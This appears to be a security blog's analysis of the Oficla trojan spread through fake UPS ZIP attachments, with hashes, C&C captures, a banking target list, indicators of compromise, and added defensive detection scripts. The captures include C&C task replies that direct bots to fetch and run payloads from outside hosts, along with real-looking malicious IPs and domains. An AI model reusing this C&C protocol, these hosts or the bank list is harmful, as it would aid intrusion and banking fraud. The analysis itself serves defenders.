Fake UPS ZIP Attachments Spread Oficla Trojan
Several users have submitted malware samples to us that arrived as attachments to fake UPS delivery-notification spam. Each attachment is a ZIP archive containing an executable whose icon mimics a Microsoft Word document, so a victim browsing the archive sees what looks like a shipping document rather than a program:

File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 of 16 (31%)
Status: INFECTED
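The lure works because the icon, not the extension, is what the victim looks at. A mail gateway or sandbox should therefore decide by file content, not by name. The following check is an added example (not code from the original post): it opens a ZIP attachment and flags every member that carries a PE header, whatever its extension, plus members with an executable extension even when the header check fails. The archive, the dummy MZ/PE payload and the member names are constructed for the demonstration; only the attachment name Label_UPS_Nr11373.exe is taken from the page.

```python
# Content-based scan of ZIP attachments for executables.
# Added example, not code from the original post. The archive and the
# dummy PE payload are constructed in memory; nothing real is executed.
import io
import zipfile

# Extensions Windows will run directly when double-clicked.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}


def is_pe(data):
    """True if data starts like a PE image: 'MZ' DOS header whose e_lfanew
    field (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = int.from_bytes(data[0x3C:0x40], "little")
    return data[off:off + 4] == b"PE\x00\x00"


def scan_zip(zip_bytes):
    """Return (member name, reason) for each member that should be blocked.
    The header check runs first so a PE renamed to .doc is still caught."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            head = zf.open(info).read(4096)     # the headers sit in the first bytes
            if is_pe(head):
                flagged.append((name, "PE header"))
            elif ext in EXEC_EXTENSIONS:
                flagged.append((name, "executable extension"))
    return flagged


def fake_pe():
    """Constructed minimal DOS stub + PE signature; not a runnable program."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


def build_sample():
    """Constructed attachment: the lure name from the page, a PE renamed to
    .doc, a screensaver extension with non-PE content, and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Label_UPS_Nr11373.exe", fake_pe())
        zf.writestr("Label_UPS_Nr11373.doc", fake_pe())
        zf.writestr("notes.scr", b"not a PE, but the extension alone is enough")
        zf.writestr("readme.txt", b"Your parcel could not be delivered.")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_zip(build_sample()):
        print("BLOCK %-24s (%s)" % (name, reason))
```

Reading only the first 4 KiB of each member keeps the check cheap on large archives; nested archives and encrypted ZIPs are not handled here and need a separate policy.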
Files created after executing the EXE:

File name: svrwsc.exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 of 16 (13%)
Status: INFECTED
File name: sbxj.lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 of 16 (13%)
Status: INFECTED
File name: ex-08.exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 of 16 (13%)
Status: INFECTED
The file dropped into the system directory, sbxj.lyo, is the main component of the Oficla trojan (also known as Sasfis): a downloader that takes its orders from a C&C server and, in this case, is used to install the rogue security software Security Tool. Note that the .lyo extension is meaningless; the file is a Windows executable.
Network Traffic:
GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru
Response:
[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]
Network Traffic:
GET /test/morph.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46
Response:
HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:45 GMT
Content-Disposition: attachment; filename="morph.exe"
Content-Transfer-Encoding: binary
Content-Length: 62464
Content-Type: application/octet-stream
Network Traffic:
GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru
Response:
[info]kill:0|runurl:hxxp://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]
Network Traffic:
GET /test/69.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46
Response:
HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:47 GMT
Content-Disposition: attachment; filename="69.exe"
Content-Transfer-Encoding: binary
Content-Length: 15360
Content-Type: application/octet-stream
This traffic shows how the Oficla component takes its orders. The beacon to webauc. ru carries a version (v=200), a bot id and a tag (b=13oktabr, apparently a build or campaign name); the [info]...[/info] reply names a URL to fetch (runurl), a task id and a retry delay. The bot downloads morph.exe from 91.204.48.46, reports back with tid=16&r=1 (task 16 done), receives a second task for 69.exe, and downloads and executes that as well. Two details are worth keeping as indicators: the User-Agent "Opera\9.64" with a backslash, which a genuine Opera browser (Opera/9.64) never sends, and the fact that morph.exe is served with Content-Length 62464, exactly the size of the svrwsc.exe dropped earlier.
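The task format above is simple enough to parse, and the beacon is distinctive enough to hunt for in proxy logs. The block below is an added example (not code from the original post or from the malware): it parses the two [info]...[/info] replies into their fields, derives the Host header and request path of the download that follows each task, and labels proxy-log requests that look like the beacon, the task-result report, or the backslash User-Agent. The log lines are constructed from the requests on the page, with the defanged hxxp and "webauc. ru" restored to real URL syntax so the standard library can parse them.

```python
# Parser for the Oficla C&C task format and a classifier for its beacons.
# Added example, not code from the original post or from the malware.
# Sample data is constructed from the requests and responses shown above
# (defanged "hxxp" and "webauc. ru" restored to real URL syntax for parsing).
import re
from urllib.parse import urlparse, parse_qs

RESPONSES = [
    "[info]runurl:http://91.204.48.46/test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]",
    "[info]kill:0|runurl:http://91.204.48.46/test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]",
]

# Constructed proxy-log lines: "<method> <url> <user-agent>".
LOG = [
    "GET http://webauc.ru/mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 Opera\\9.64",
    "GET http://91.204.48.46/test/morph.exe Opera\\9.64",
    "GET http://webauc.ru/mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 Opera\\9.64",
    "GET http://www.example.com/index.html Opera/9.64",   # benign browser traffic
]

INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.S)
INT_KEYS = {"taskid", "delay", "upd", "kill"}


def parse_task(body):
    """Turn one [info]...[/info] reply into a dict, or None if the reply carries
    no task block. taskid/delay/upd/kill become ints, backurls becomes a list."""
    m = INFO_RE.search(body)
    if not m:
        return None
    task = {}
    for field in m.group(1).split("|"):
        if ":" not in field:
            continue
        key, value = field.split(":", 1)    # first ':' only; runurl contains "http:"
        if key in INT_KEYS and value.isdigit():
            task[key] = int(value)
        elif key == "backurls":
            task[key] = [u for u in value.split(",") if u]
        else:
            task[key] = value
    return task


def next_fetch(task):
    """(host, path) of the download the bot will make for this task, i.e. the
    Host header and request line of the next GET seen on the wire."""
    u = urlparse(task["runurl"])
    return u.netloc, u.path


BEACON_KEYS = {"v", "id", "b", "tm"}


def classify(url, user_agent):
    """Labels for one request: bot User-Agent, beacon, or task-result report."""
    labels = []
    if "\\" in user_agent:          # real Opera sends "Opera/9.64", the bot "Opera\9.64"
        labels.append("backslash-ua")
    u = urlparse(url)
    q = parse_qs(u.query)
    if u.path.endswith("/bb.php") and BEACON_KEYS <= set(q):
        if "tid" in q and q.get("r") == ["1"]:
            labels.append("task-report tid=%s" % q["tid"][0])
        else:
            labels.append("beacon")
    return labels


def scan_log(lines):
    """Return (url, labels) for every log line that gets at least one label."""
    hits = []
    for line in lines:
        _method, url, ua = line.split(" ", 2)
        labels = classify(url, ua)
        if labels:
            hits.append((url, labels))
    return hits


if __name__ == "__main__":
    for r in RESPONSES:
        t = parse_task(r)
        host, path = next_fetch(t)
        print("task %d -> GET %s (Host: %s)" % (t["taskid"], path, host))
    for url, labels in scan_log(LOG):
        print(url, labels)
```

The backslash test is the cheapest of the three signals and survives the operators changing the path or parameter names; the bb.php test is the most specific to this campaign.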
Network Traffic:
GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0
Host: 188.65.74.163
Response:
HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 987648
Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT
The file avpsoft_dfhljkghsdflg.exe is the installer of the rogue security software Security Tool. Judging by the server Date header (15:57:46), this download took place about a minute before the morph.exe and 69.exe fetches shown above, so the captures are not listed in chronological order. Once it runs, new popup windows appear:

Security Tool has been fully installed:

Files created during the installation of Security Tool:
Documents and Settings\user\Local Settings\Application Data\2730621030.exe
Documents and Settings\user\Start Menu\Programs\Security Tool.lnk
File name: 2730621030.exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 of 16 (13%)
Status: INFECTED
Network Traffic:
POST /us/federal/index.php HTTP/1.0
Accept: */*
Host: padreim. ru
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6191
The body is binary; the readable strings in it are the following wildcard patterns, in order (the last entry is cut off in the capture):
*ebc_ebc1961* *cibng.ibanking-services.com* *springbankconnect.com* *ibanking-services.com* *mystreetscape.com* */inets/Login* *business.macu.com* *cnbsec1.cnbank.com*
*cnbank.com* *scottvalleybank* *hillsbank* *efirstbank* *addisonavenue.com* *secure.fundsxpress.com* *site-secure.com* *umpquabank.com*
*fundsxpress.com* *mystreetscape* *treasurypathways.com* *secure.ally.com* *bankonline.umpquabank.com* *servlet/teller* *nsbank.com* *comerica.com*
*cashmgt.firsttennessee* *securentry.calbanktrust.com* *securentry* *express.53.com* *homebank.nbg.gr* *online.ccbank.bg* *hsbc* *ebanking.eurobank.gr*
*itreasury.regions.com* */Common/SignOn/Start.asp* *wellsoffice.wellsfargo.com* *chsec.wellsfargo.com* *telepc.net* *ceowt.wellsfargo.com* *enterprise2.openbank.com* *global1.onlinebank.com*
*webexpress* */sbuser/* *webcash* *www2.firstbanks.com/olb* *bxs.com* *PassMarkRecognized.aspx* *businesslogin* *hbcash.exe*
*otm.suntrust.com* *wire* *ACH* */inets/* *corpACH* *wcmfd/wcmpw/* */IBWS/* */ibs.*
*/livewire/* */olbb/* *singlepoint.usbank.com* *bolb.associatedbank.com* *fnfgbusinessonline.enterprisebanker.com* *lakecitybank.webcashmgmt.com* */inets/* *bob.sovereignbank.com
This is a target list for a banking component: wildcard URL patterns covering the login and cash-management pages of US, Greek and Bulgarian banks and of shared online-banking providers such as fundsxpress.com and ibanking-services.com, plus deliberately broad terms such as *wire*, *ACH* and *businesslogin*. The malware uses it to single out traffic to those sites. Which of the downloaded executables issues this POST, and what it does with a matching session, is not visible in this capture.
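A list like this is also useful to defenders: run it over proxy logs and you learn which users on an infected network would have been of interest to the operators. The block below is an added example, not the malware's own matching code. It compiles a subset of the patterns above into anchored regular expressions (a '*' matches any run of characters) and reports the matches for some constructed proxy-log lines. Case-insensitive matching is an assumption; the page does not show how the trojan compares URLs. The sample URLs are constructed, and the final pattern is kept without its trailing '*' exactly as the capture shows it, which makes it match only a URL that ends with that host.

```python
# Matcher for the wildcard bank target list returned by the C&C.
# Added example, not code from the original post or from the malware.
# Case-insensitive matching is an assumption. Log lines are constructed.
import re

# Subset of the patterns in the response above, copied verbatim.
TARGETS = [
    "*cibng.ibanking-services.com*", "*/inets/Login*", "*secure.ally.com*",
    "*servlet/teller*", "*express.53.com*", "*hsbc*", "*/Common/SignOn/Start.asp*",
    "*wellsoffice.wellsfargo.com*", "*PassMarkRecognized.aspx*", "*wire*", "*ACH*",
    "*corpACH*", "*singlepoint.usbank.com*", "*bob.sovereignbank.com",
]

# Constructed proxy-log lines: "<timestamp> <client> <url>".
LOG = [
    "2010-10-20T15:59:01 10.0.0.5 https://secure.ally.com/login",
    "2010-10-20T15:59:02 10.0.0.7 https://www.hsbc.co.uk/",
    "2010-10-20T15:59:03 10.0.0.9 https://www.example.com/news/wired-headlines",
    "2010-10-20T15:59:04 10.0.0.9 https://www.example.com/",
]


def glob_to_regex(pattern):
    """'*' becomes '.*'; everything else is literal. The regex is anchored at
    both ends, so a pattern without a trailing '*' only matches a URL that
    ends with it (this is why the truncated last entry matches so little)."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.I)


COMPILED = [(p, glob_to_regex(p)) for p in TARGETS]


def matching_patterns(url):
    """All target patterns that match the given URL, in list order."""
    return [p for p, rx in COMPILED if rx.search(url)]


def scan_proxy_log(lines):
    """(client, url, patterns) for each log line the target list would match."""
    hits = []
    for line in lines:
        _ts, client, url = line.split(None, 2)
        hit = matching_patterns(url)
        if hit:
            hits.append((client, url, hit))
    return hits


if __name__ == "__main__":
    for client, url, hit in scan_proxy_log(LOG):
        print("%s %s -> %s" % (client, url, ", ".join(hit)))
```

The third log line is the caveat: *wire* was written to catch wire-transfer pages, but it also matches an unrelated news URL, so expect noise from the short patterns and treat a hit on a bank-specific host as far stronger evidence than a hit on *wire*, *ACH* or *hsbc* alone.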
Network Traffic:
GET /outlook.exe HTTP/1.0
Host: 109.196.143.135
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.34
Date: Wed, 20 Oct 2010 15:57:51 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT
Accept-Ranges: bytes
A further payload, outlook.exe, is fetched from 109.196.143.135; its Content-Length of 259072 bytes is exactly the size of the ex-08.exe file listed above.
Security Tool then connects to the fraudulent payment site that collects the "licence" fee:
GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: fastpayform. biz
The title of the HTML page is:
<title>Security Tool - Payment Page</title>
Network Traffic:
GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: 77.78.201.23
The same q value is sent to both the payment page and 77.78.201.23, so it serves as an identifier for this installation across the two requests.
Domain & IP Analysis (host, then resolved IP address or reverse DNS name; "-" where nothing resolved):
webauc. ru – 85.195.104.162
91.204.48.46 – -
188.65.74.163 – -
109.196.143.135 – -
fastpayform. biz – 195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba